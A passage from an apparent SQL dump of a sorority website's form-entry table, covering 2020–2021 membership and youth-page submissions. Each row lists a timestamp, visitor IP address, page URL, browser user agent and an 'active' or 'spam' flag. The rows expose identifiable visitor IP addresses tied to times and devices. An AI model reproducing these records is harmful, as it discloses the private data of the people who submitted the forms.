16:57:26',0,0,'50.206.158.166','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(420,7,NULL,'2020-05-06 17:00:32',0,0,'50.206.158.166','https://zphiblgz.org/sorority-membership/youth/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(421,10,NULL,'2020-05-07 12:38:27',0,0,'128.71.35.116','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(422,10,NULL,'2020-05-10 14:21:52',0,0,'128.71.228.56','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(423,7,NULL,'2020-07-05 17:33:53',0,0,'5.188.84.6','https://zphiblgz.org/sorority-membership/youth/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(424,10,NULL,'2020-07-13 16:40:40',0,0,'107.77.202.221','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(425,10,NULL,'2020-07-13 20:24:41',0,0,'5.188.84.76','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(426,10,NULL,'2020-07-27 21:19:05',0,0,'5.188.84.76','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(427,10,NULL,'2020-08-12 09:51:54',0,0,'174.244.212.107','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(428,10,NULL,'2020-08-12 09:52:03',0,0,'174.244.212.107','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(429,10,NULL,'2020-08-12 18:27:19',0,0,'172.58.187.110','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(430,10,NULL,'2020-08-17 18:48:51',0,0,'68.134.21.196','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(431,10,NULL,'2020-08-19 21:15:48',0,0,'216.81.81.82','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; Touch; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(432,7,NULL,'2020-08-21 22:16:09',0,0,'5.188.84.6','https://zphiblgz.org/youth/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(433,10,NULL,'2020-08-24 14:16:56',0,0,'141.156.150.57','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(434,10,NULL,'2020-08-24 20:42:49',0,0,'141.156.150.57','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(435,10,NULL,'2020-08-27 17:25:20',0,0,'5.188.84.245','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.71','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(436,10,NULL,'2020-09-15 08:56:57',0,0,'191.101.81.140','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2936.87 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(437,10,NULL,'2020-09-19 15:40:00',0,0,'173.79.30.20','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(438,10,NULL,'2020-09-22 04:35:28',0,0,'5.188.84.245','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(439,10,NULL,'2020-10-01 21:31:57',0,0,'191.101.72.60','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(440,10,NULL,'2020-10-05 02:57:06',0,0,'69.143.140.66','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(441,10,NULL,'2020-10-15 01:43:33',0,0,'185.143.231.222','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2975.74 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(442,10,NULL,'2020-11-01 00:27:59',0,0,'154.16.50.223','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:46.0) Gecko/20100101 Firefox/46.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(443,10,NULL,'2020-11-04 19:50:24',0,0,'73.135.39.45','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(444,10,NULL,'2020-11-06 02:12:53',0,0,'69.250.70.211','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(445,10,NULL,'2020-11-08 22:44:30',0,0,'100.16.232.206','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(446,7,NULL,'2020-11-08 22:54:11',0,0,'100.16.232.206','https://zphiblgz.org/youth/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(447,7,NULL,'2020-11-08 23:01:18',0,0,'100.16.232.206','https://zphiblgz.org/youth/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(448,10,NULL,'2020-12-01 14:51:33',0,0,'69.250.244.134','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(449,10,NULL,'2020-12-16 05:21:49',0,0,'191.101.99.95','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:46.0) Gecko/20100101 Firefox/46.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(450,10,NULL,'2020-12-23 00:26:55',0,0,'172.58.187.97','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(451,10,NULL,'2021-01-06 04:54:15',0,0,'73.213.35.98','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(452,10,NULL,'2021-01-07 17:36:48',0,0,'172.58.190.176','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(453,10,NULL,'2021-01-15 19:38:41',0,0,'107.77.241.42','http://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(454,10,NULL,'2021-01-16 16:01:36',0,0,'107.77.220.232','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(455,10,NULL,'2021-01-17 20:49:24',0,0,'68.134.190.72','http://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 10; SM-G973U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(456,10,NULL,'2021-01-18 14:44:59',0,0,'174.244.214.122','http://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(457,10,NULL,'2021-01-20 06:49:55',0,0,'107.77.203.8','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(458,10,NULL,'2021-01-22 16:29:46',0,0,'107.77.203.8','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(459,10,NULL,'2021-01-24 18:18:31',0,0,'69.251.57.182','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(460,10,NULL,'2021-01-26 00:36:42',0,0,'107.77.204.231','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(461,10,NULL,'2021-01-28 01:19:52',0,0,'141.98.152.208','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(462,10,NULL,'2021-02-07 03:42:56',0,0,'68.134.22.18','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.77 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(463,10,NULL,'2021-02-07 03:43:12',0,0,'68.134.22.18','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.77 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(464,10,NULL,'2021-02-08 23:51:15',0,0,'96.244.5.173','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(465,10,NULL,'2021-02-14 01:47:00',0,0,'69.140.240.88','http://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(466,10,NULL,'2021-02-25 15:30:20',0,0,'139.28.220.186','http://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(467,10,NULL,'2021-02-26 07:34:14',0,0,'107.77.203.116','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(468,10,NULL,'2021-03-06 19:10:45',0,0,'172.58.190.239','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.181 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(469,7,NULL,'2021-03-07 21:32:50',0,0,'71.244.153.239','http://zphiblgz.org/youth/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.77 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(470,10,NULL,'2021-03-16 02:10:08',0,0,'68.83.63.14','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(471,10,NULL,'2021-03-29 01:10:01',0,0,'68.134.18.12','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 11; SM-G998U Build/RP1A.200720.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(472,10,NULL,'2021-03-29 22:22:56',0,0,'173.64.118.69','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 8.0.0; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(473,10,NULL,'2021-04-04 18:45:44',0,0,'107.77.203.204','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(474,10,NULL,'2021-04-18 12:14:30',0,0,'172.58.190.159','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(475,10,NULL,'2021-04-23 23:14:05',0,0,'172.58.188.227','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/308.0.0.50.116;FBBV/284487090;FBDV/iPhone11,8;FBMD/iPhone;FBSN/iOS;FBSV/14.4.2;FBSS/2;FBCR/;FBID','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(476,10,NULL,'2021-04-23 23:25:24',0,0,'172.58.188.189','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/308.0.0.50.116;FBBV/284487090;FBDV/iPhone11,8;FBMD/iPhone;FBSN/iOS;FBSV/14.4.2;FBSS/2;FBCR/;FBID','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(477,10,NULL,'2021-04-24 15:15:46',0,0,'172.58.188.243','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/308.0.0.50.116;FBBV/284487090;FBDV/iPhone11,8;FBMD/iPhone;FBSN/iOS;FBSV/14.4.2;FBSS/2;FBCR/;FBID','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(478,10,NULL,'2021-04-24 16:43:11',0,0,'172.58.188.131','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/308.0.0.50.116;FBBV/284487090;FBDV/iPhone11,8;FBMD/iPhone;FBSN/iOS;FBSV/14.4.2;FBSS/2;FBCR/;FBID','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(479,10,NULL,'2021-04-24 18:23:59',0,0,'172.58.188.46','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/308.0.0.50.116;FBBV/284487090;FBDV/iPhone11,8;FBMD/iPhone;FBSN/iOS;FBSV/14.4.2;FBSS/2;FBCR/;FBID','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(480,10,NULL,'2021-04-30 22:57:43',0,0,'172.58.187.74','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(481,10,NULL,'2021-05-04 15:29:53',0,0,'71.244.254.236','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(482,7,NULL,'2021-05-17 17:37:35',0,0,'72.81.228.22','https://zphiblgz.org/youth/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.62','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(483,10,NULL,'2021-05-21 11:02:25',0,0,'100.16.232.206','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(484,10,NULL,'2021-05-26 11:50:02',0,0,'71.244.254.236','http://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/260.2.0.77.119;FBBV/209842380;FBDV/iPhone8,2;FBMD/iPhone;FBSN/iOS;FBSV/14.4.2;FBSS/3;FBCR/;FBID/','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(485,10,NULL,'2021-05-26 14:39:34',0,0,'100.36.67.81','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(486,10,NULL,'2021-05-30 16:13:27',0,0,'5.188.48.58','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4086.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(487,10,NULL,'2021-06-09 00:49:54',0,0,'71.121.211.25','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(488,10,NULL,'2021-06-09 02:33:04',0,0,'71.121.211.25','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(489,10,NULL,'2021-06-10 03:30:27',0,0,'96.255.181.110','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/316.0.0.26.120;FBBV/296553292;FBDV/iPhone11,8;FBMD/iPhone;FBSN/iOS;FBSV/14.6;FBSS/2;FBCR/;FBID/pho','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(490,10,NULL,'2021-06-16 14:45:06',0,0,'5.188.48.58','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4096.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(491,10,NULL,'2021-06-28 20:19:11',0,0,'5.188.48.58','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4099.2 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(492,10,NULL,'2021-07-01 23:54:36',0,0,'71.121.211.25','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(493,10,NULL,'2021-07-02 00:01:50',0,0,'71.121.211.25','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(494,10,NULL,'2021-07-05 17:11:45',0,0,'69.143.112.224','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G981V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.2 Chrome/87.0.4280.141 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(495,10,NULL,'2021-07-10 19:45:07',0,0,'5.188.48.58','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(496,7,NULL,'2021-07-16 23:37:04',0,0,'94.103.234.217','https://zphiblgz.org/youth/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4086.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(497,10,NULL,'2021-07-25 22:05:25',0,0,'94.103.232.46','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4098.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(498,10,NULL,'2021-07-26 08:19:18',0,0,'5.188.48.58','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4089.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(499,7,NULL,'2021-08-03 03:52:15',0,0,'5.188.48.10','https://zphiblgz.org/youth/','Mozilla/5.0 (Windows NT 6.3; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(500,10,NULL,'2021-08-11 14:27:57',0,0,'5.188.48.58','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(501,7,NULL,'2021-08-23 